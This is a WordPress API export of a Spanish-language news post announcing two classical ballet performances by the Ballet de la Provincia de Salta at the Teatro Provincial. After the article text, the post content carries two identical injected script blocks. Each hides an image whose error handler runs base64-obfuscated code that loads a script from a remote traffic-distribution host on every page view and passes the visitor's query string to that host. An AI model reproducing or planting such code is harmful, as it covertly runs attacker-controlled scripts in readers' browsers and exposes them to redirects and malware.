{"id":1668,"date":"2022-10-24T10:29:12","date_gmt":"2022-10-24T13:29:12","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1668"},"modified":"2025-08-14T00:32:22","modified_gmt":"2025-08-14T03:32:22","slug":"el-ballet-de-la-provincia-presenta-suites-clasicas-en-el-teatro-provincial","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1668","title":{"rendered":"El Ballet de la Provincia presenta \u201cSuites Cl\u00e1sicas\u201d en el Teatro Provincial"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#870727\"><em>Ser\u00e1 el 27 y 29 de octubre a partir de las 21, el cuerpo art\u00edstico se prepara para brindar una propuesta en dos funciones. Jubilados y estudiantes sin cargo.<\/em><\/h4>\n\n\n\n<p>El Ballet de la Provincia de Salta, ofrecer\u00e1 un programa del repertorio cl\u00e1sico, los d\u00edas jueves 27 y viernes 28 de octubre a las 21 en el Teatro Provincial \u201cJuan Carlos Saravia\u201d, Zuvir\u00eda 70.<\/p>\n\n\n\n<p>Esta presentaci\u00f3n incluir\u00e1 una suite del \u201c3er acto del ballet Raymonda\u201d con m\u00fasica de A. Glazunov; Pas De Deux de \u201cRomeo y Julieta\u201d con m\u00fasica de Sergei Prok\u00f3fiev, y \u201cBodas de Aurora\u201d del 3er acto del ballet \u201cLa Bella Durmiente del Bosque\u201d con m\u00fasica de P. Tchaikovsky.<\/p>\n\n\n\n<p>La direcci\u00f3n art\u00edstica se encuentra a cargo del Maestro Miguel Elias. Las localidades tienen un valor \u00fanico de $300 y se adquieren en saltaticket.gob.ar<\/p>\n\n\n\n<p>El ingreso se realizar\u00e1 por orden de llegada. Entradas sin cargo para jubilados y estudiantes por boleter\u00eda del Teatro.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-ballet-de-la-provincia-presenta-suites-clasicas-en-el-teatro-provincial-85644\" target=\"_blank\" rel=\"noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Ser\u00e1 el 27 y 29 de octubre a partir de las 21, el cuerpo art\u00edstico se prepara para brindar una propuesta en dos funciones. Jubilados y estudiantes sin cargo. El Ballet de la Provincia de Salta, ofrecer\u00e1 un programa del repertorio cl\u00e1sico, los d\u00edas jueves 27 y viernes 28 de octubre a las 21 en [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1669,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[13],"tags":[],"class_list":{"0":"post-1668","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1668"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1668"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1668\/revisions"}],"predecessor-version":[{"id":7306,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1668\/revisions\/7306"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1669"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1668"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1668"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1668"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}